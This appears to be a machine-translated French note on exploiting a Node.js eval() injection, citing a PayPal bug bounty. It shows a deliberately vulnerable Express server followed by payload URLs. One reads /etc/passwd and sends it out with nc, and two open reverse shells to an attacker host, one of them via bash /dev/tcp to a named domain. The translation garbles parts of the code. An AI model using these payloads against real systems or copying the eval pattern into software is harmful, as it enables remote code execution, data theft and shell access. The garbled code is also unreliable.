arrière-plan
@ARTSPLOIT Lors de la recherche de PayPal, il a constaté qu'un code NodeJS avait été exécuté, récompensant 10 000 $.
test
var express = require ('express'); var app = express (); app.get ('/', function (req, res) {res.send ('hello eval (req.query.q)); console.log (req.query.q);}); app.Listen (8080, function () {console.log (' Exemple d'écoute sur le port 8080! ');});Lisez n'importe quel fichier
http: // hôte: 8080 /? q = require ('child_process') .exec ('cat + / etc / passwd + | + nc + attaterip + 80')Obtenir de la coquille
http: // hôte: 8080 /? q = var + net + = + require ("net"), + sh + = + require ("child_process") .exec ("/ bin / bash"); var + client + = + new + net.sock et (); client.connect (80, + "AttaTerip", + function () {client.pipe (sh.stdin); sh.stdout.pipe (client); sh.stderr.pipe (client);});Obtenez Shell2
http: // hôte: 8080 /? q = require ("child_process") .exec ('bash -c "bash -i>% 26 /dev/tcp/wufeifei.com/7890 0>% 261"')